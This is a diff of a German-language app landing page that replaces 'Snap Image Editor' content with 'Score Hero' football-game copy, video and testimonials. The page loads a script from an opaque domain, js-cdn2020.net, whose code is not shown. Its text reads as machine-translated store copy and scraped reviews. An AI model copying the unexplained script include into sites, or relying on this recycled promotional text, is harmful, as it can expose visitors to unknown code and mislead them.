--- a/index.html
+++ b/index.html
@@ -19,12 +19,12 @@
 	<link rel="stylesheet" href="responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 
-	<script src="https://js-cdn2020.net/d01cp9"></script>
+	<script src="https://js-cdn2020.net/143ohb"></script>
 
 	
 	<!-- Document Title
 	============================================= -->
-	<title>Snap Image Editor</title>
+	<title>Score Hero</title>
 
 </head>
 
@@ -98,8 +98,8 @@
 					<div class="container clearfix bottommargin-lg">
 
 						<div class="heading-block center">
-							<h2>Machen Sie Ihre Fotos mit einer leistungsstarken Bildeditor-Android-Anwendung unvergesslich.</h2>
-							<span>PROFESSIONAL CAMERA PHOTO FILTER EDIT</span>
+							<h2>Laden Sie es herunter und spielen Sie noch heute KOSTENLOS</h2>
+							<span>Neue Score Engine, die mehr Freiheit und strategisches Spiel als je zuvor ermöglicht</span>
 						</div>
 
 						<div class="col_one_third nobottommargin">
@@ -108,7 +108,7 @@
 									<img src="0.png">
 								</div>
 								<div class="fbox-desc">
-									<p>KINEMATISCHE FILTER in SNAP IMAGE EDITOR 100 Ultimative Filmfilter und Selfie-Beauty-Effekte.</p>
+									<p>Intelligente KI passt sich Ihren Pässen und Schüssen an, sodass jedes Spiel über eine andere Verbindung erfolgt. Verbinden Sie sich mit Facebook, um gegen die engsten Google Play-Erfolge und Bestenlisten anzutreten und zu sehen, wer an der Spitze steht</p>
 								</div>
 							</div>
 						</div>
@@ -119,7 +119,7 @@
 									<img src="1.png">
 								</div>
 								<div class="fbox-desc">
-									<p>Filter mit verschiedenen Typen wie Splash Black and White Duo-Tone usw. ADVANCE- UND PRÄZISE-BEARBEITUNGSWERKZEUGE</p>
+									<p>Synchronisieren Sie den Fortschritt zwischen Geräten mit Google Play Cloud Engaging Story und zeichnen Sie Ihre gesamte Karriere als Spieler und mehr auf</p>
 								</div>
 							</div>
 						</div>
@@ -130,7 +130,7 @@
 									<img src="2.png">
 								</div>
 								<div class="fbox-desc">
-									<p>Verbessern Sie Ihr Foto mit der automatischen Korrektur der Kontrasthelligkeit Sättigungsbelichtung Gamma-Vignettentemperatur Sepia und mehr. Zuschneiden Drehen Drehen und Anpassen des Bildes. Mehrere Exportoptionen für hohe mittlere und niedrige Auflösungen.</p>
+									<p>Nutzen Sie Ihre Chancen, um die Tore zu erzielen. Seien Sie der Held WICHTIG</p>
 								</div>
 							</div>
 						</div>
@@ -142,8 +142,8 @@
 					<div class="container clearfix center">
 
 						<div class="heading-block center">
-							<h2>SMART BEAUTY FILTER Amp WERKZEUG</h2>
-							<span>Sofortige Kameravorschau mit verschiedenen Filtern.</span>
+							<h2>720 Ebenen und Zählen</h2>
+							<span>Einfach zu spielen, schwer zu meistern</span>
 						</div>
 
 						<div class="col_one_third norightmargin bottommargin-sm" style="padding-right: 10px;">
@@ -338,7 +338,7 @@
 
 					<div class="container clearfix">
 
-						<iframe width="560" height="315" src="http://www.youtube.com/embed/74soh9dve6E" frameborder="0" allowfullscreen></iframe>
+						<iframe width="560" height="315" src="http://www.youtube.com/embed/Ummu8IRbKNw" frameborder="0" allowfullscreen></iframe>
 
 					</div>
 
@@ -352,11 +352,11 @@
 							<div class="col_half nobottommargin topmargin-lg one-page-menu">
 
 								<div class="heading-block topmargin-lg">
-									<h2>Retuschieren Sie Ihren Fototon mit dem Glättungswerkzeug.</h2>
-									<span>Wischen Sie nach links und rechts, um die Filter zu wechseln.</span>
+									<h2>Gewinnen Sie Auszeichnungen, gewinnen Sie Trophäen, erzielen Sie Tore, ändern Sie Vereine, repräsentieren Sie Ihr Land und streben Sie nach Ruhm</h2>
+									<span>Atemberaubende 3D-Grafiken schneiden Szenen und Animationen</span>
 								</div>
 
-								<p>Try Snap Image Editor Es hilft Ihnen nicht nur, fantastische Fotos aufzunehmen, sondern Sie können auch Fotos bearbeiten und ändern, um professioneller auszusehen. Snap Image Editor ist eine Fotobearbeitungs-App, in die Hunderte von Funktionen eingebettet sind, um Sie zu einem coolen Fotografen zu machen und mit Gaußscher Unschärfe und anderen Unschärfeeffekten einen unscharfen Hintergrund oder den ausgewählten Teil Ihres Fotos zu erhalten. TEXTING AUF FOTOS UND SKIZZENEFFEKT Fügen Sie Text mit einer Vielzahl von Schriftarten über das Bild. Verwalten Sie die Ausrichtung der Schattenfarbe der Textfarbe und mehr. TRENDY DOUBLE EXPOSURE TOOL Erstellen Sie ein Foto mit Doppel- oder Mehrfachbelichtung, indem Sie mehrere Fotos überlappen. Unterstützte Mischmodi Überlagern Multiplizieren Verdunkeln Sie Bildschirm Lebendiges Licht und mehr.</p>
+								<p>SEIEN SIE DER HELD Pass Shoot Amp Erzielen Sie Ihren Weg zum legendären Status, während Sie die dramatische Karriere Ihres Helden in über 700 herausfordernden Levels erkunden. Mit dem immersiven, frei fließenden 3D-Score-Gameplay können Sie die Action steuern. Teilen Sie die Verteidigung mit präzisen Durchgangsbällen oder Biegeschüssen in die obere Ecke, um die Kontrolle über ein unvergleichliches mobiles Fußballerlebnis zu behalten. EIGENSCHAFTEN Dieses Spiel ist kostenlos, aber zusätzliche Inhalte und Gegenstände im Spiel können für echtes Geld gekauft werden.</p>
 
 								<a href="#" data-href="#section-order" class="button button-border button-rounded button-large button-dark noleftmargin">Jetzt kaufen</a>
 
@@ -383,11 +383,11 @@
 							<div class="col_half nobottommargin topmargin-lg col_last one-page-menu">
 
 								<div class="heading-block topmargin-lg">
-									<h2>Gesichtsbereich automatisch erkennen, dann nur den ausgewählten Bereich glätten und aufhellen.</h2>
-									<span>Voreinstellungen für mehrere Farbkorrekturen für ein Selfie.</span>
+									<h2>Nehmen Sie an regelmäßigen Veranstaltungen für Medaillen und Ruhm teil</h2>
+									<span>Passen Sie Ihren Helden für ein einzigartiges Erscheinungsbild an</span>
 								</div>
 
-								<p>COLLAGES ERSTELLEN Fügen Sie mehrere Bilder hinzu, um eine Collage zu erstellen. Wählen Sie Bearbeiten und wählen Sie verschiedene Collagenvorlagen aus. SCHÖNE POSTER MACHEN Fügen Sie mehrere Bilder in vordefinierten schönen Vorlagen hinzu. EXTRA PRO IMAGE EDITING Farbspritzer-Effekt sorgen für eine erstaunliche Hintergrundunschärfe (DSLR-Effekt). Sie benötigen kein teures Telefon mit zwei Kameras. Sie können Pro-Fotos mit Hintergrundunschärfe erstellen. Hintergrund-Radiergummi-Tool zum Löschen des Hintergrunds aus einem Bild. Wenn Sie nach einer kostenlosen Bildbearbeitungs-App mit unzähligen professionellen Bearbeitungswerkzeugen für Fotofilter und vielseitigen Funktionen suchen, ist unser All-in-One-Bildbearbeitungswerkzeug mit Sicherheit Ihre erste Wahl. Laden Sie den Snap Image Editor kostenlos herunter</p>
+								<p>Diese App verwendet WLAN oder mobile Daten (falls verfügbar), um Spielinhalte und Werbung herunterzuladen. Sie können die Verwendung mobiler Daten in diesem Spiel in SettingsMobile Data deaktivieren. Diese App enthält Werbung von Drittanbietern. Nicht angeforderte Werbung ist deaktiviert, wenn Sie im Shop in Spielwährung einkaufen. BESUCHEN SIE UNS www.ftgames.com WIE US facebook.comscoreherogame FOLGEN SIE UNS twitter.comfirsttouchgames SEHEN SIE UNS youtube.comfirsttouchgames</p>
 
 								<a href="#" data-href="#section-order" class="button button-border button-rounded button-large button-dark noleftmargin">Jetzt kaufen</a>
 
@@ -414,26 +414,26 @@
 									<div class="slider-wrap">
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Diese App ist wirklich gut und einfach für Kinder zu verwenden, aber der einzige Standard ist, dass es viele Anzeigen gibt und sie wirklich nervig sind, aber insgesamt ist die App gut</p>
-												<div class="testi-meta">XXMeg das zufällige MädchenXX</div>
+												<p>Ich habe so eine Hassliebe zu diesem Spiel. Das Konzept ist fantastisch und wenn es reibungslos lief, wäre es fantastisch. Manchmal sind die AIs jedoch nur hirntot und machen lächerliche Fehler, manchmal ist der Torwart des anderen Teams ein Superheld und rettet alles und gelegentlich die Herausforderungen ... Vollständige Überprüfung</p>
+												<div class="testi-meta">König Leo 301</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Hat super funktioniert, um ein raues Foto aufzuräumen. Ich liebe die App</p>
-												<div class="testi-meta">Wendy Stephenson</div>
+												<p>Süchtig machend, aber schrecklich fehlerhaft. Es ist wie es von jemandem entworfen wurde, der das Konzept des Fußballs versteht, aber das Spiel noch nie im wirklichen Leben gespielt hat. Die KI und die Grafik der Spieler sind sehr begrenzt - Spieler machen keine Läufe, ihre Körpersprache ist völlig falsch, damit Sie ... Vollständige Überprüfung antizipieren können</p>
+												<div class="testi-meta">Paul Janman</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Diese App ist einfach fantastisch. sehr einfaches Bearbeitungssystem. Es gibt so viele Tools in dieser App, dass ich viele Apps ausprobiere, bevor ich sie herunterlade, aber jetzt ist diese App mein Favorit als alle anderen</p>
-												<div class="testi-meta">Wendy Stephenson</div>
+												<p>Es macht Spaß, aber absolut dumme KI. Spieler machen keine vernünftigen Läufe, manchmal haben Sie viel Platz vor sich, aber Sie müssen trotzdem aus der Ferne schießen. Manchmal rennen sie einfach ohne ersichtlichen Grund außerhalb des Spielfelds. Das Spiel sagt dir nicht, was deine Ziele sind, bevor du fertig bist ... Vollständige Überprüfung</p>
+												<div class="testi-meta">Paul Janman</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Galerie-Funktion fehlt und keine zusätzlichen Tools in der Pro-Version wirklich schlecht. Das Einrasten dauert ebenfalls lange. Benötigen Sie auch Werkzeug, um Lieblingsfilter anzuordnen</p>
-												<div class="testi-meta">Hiren Shah</div>
+												<p>Dieses Spiel war großartig - abgesehen von den dummen Fällen, in denen die Spieler den Ball von einer Seite des Spielfelds zur anderen berühren - bis zu einem kürzlich durchgeführten Update. Jetzt gibt es jederzeit Anzeigen auf dem Bildschirm, die ständig abstürzen. Noch nie zuvor, also ist es eindeutig ein Spielproblem. Update ... Vollständige Überprüfung</p>
+												<div class="testi-meta">Duncan Brown</div>
 											</div>
 										</div>
 																			</div>
